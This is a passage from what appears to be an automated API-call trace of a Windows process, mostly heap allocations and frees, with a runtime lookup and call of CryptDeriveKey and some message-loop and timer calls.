0x2e51598 [0227.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0227.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3c8 [0227.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0227.330] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0227.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3c8 | out: hHeap=0x970000) returned 1 [0227.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0227.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51370 [0227.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0227.330] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0227.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0227.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0227.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0227.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0227.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0227.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0227.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0227.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0227.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0227.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0227.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0227.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0227.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0227.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0227.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0227.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0227.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0227.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0227.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0227.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f710 | out: hHeap=0x970000) returned 1 [0227.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0227.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0227.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0227.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0227.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0227.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0227.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0227.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0227.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0227.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0227.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0227.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0227.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0227.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0227.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0227.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0227.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0227.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0227.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0227.332] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0227.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0227.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0227.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0227.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0227.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0227.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0227.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0227.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0227.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0227.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0227.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0227.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0227.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0227.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0227.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0227.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0227.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0227.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0227.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0227.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0227.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0227.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0227.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0227.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0227.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0227.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0227.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0227.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0227.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0227.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0227.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0227.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0227.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0227.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0227.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0227.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0227.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0227.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0227.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0227.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0227.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0227.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0227.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0227.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0227.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0227.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f670 [0227.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0227.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0227.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0227.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0227.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0227.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0227.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0227.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0227.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0227.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0227.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0227.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0227.334] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0227.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e51430 [0227.334] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e51430, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0227.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0227.334] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0227.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0227.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0227.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b88 [0227.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0227.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0227.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0227.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0227.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0227.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0227.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0227.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0227.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0227.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0227.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0227.335] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87090, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87550) returned 1 [0227.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0227.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0227.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0227.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0227.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0227.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0227.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0227.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0227.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0227.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0227.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0227.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0227.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0227.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0227.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0227.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0227.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0227.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0227.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0227.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0227.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0227.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0227.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0227.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0227.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0227.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0227.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0227.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0227.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0227.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0227.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0227.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0227.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0227.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0227.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0227.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0227.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0227.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0227.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0227.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0227.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0227.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0227.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0227.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0227.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0227.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0227.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0227.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0227.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0227.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0227.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f670 | out: hHeap=0x970000) returned 1 [0227.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0227.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0227.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0227.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0227.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0227.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0227.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0227.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0227.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0227.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0227.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0227.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0227.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0227.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0227.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0227.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0227.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0227.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0227.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0227.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0227.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0227.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0227.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0227.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0227.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0227.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0227.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0227.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0227.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b18 | out: hHeap=0x970000) returned 1 [0227.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0227.338] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 1 [0227.339] TranslateMessage (lpMsg=0x8cf3b8) returned 0 [0227.339] DispatchMessageW (lpMsg=0x8cf3b8) returned 0x0 [0227.339] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0227.339] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0227.339] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0227.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0227.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0227.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0227.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0227.339] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0227.339] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0227.339] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0227.339] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0227.339] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0227.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0227.340] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0227.340] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0227.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0227.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0227.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0227.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0227.340] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0227.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0227.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0227.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0227.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0227.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0227.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0227.340] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.340] RtlAllocateHeap 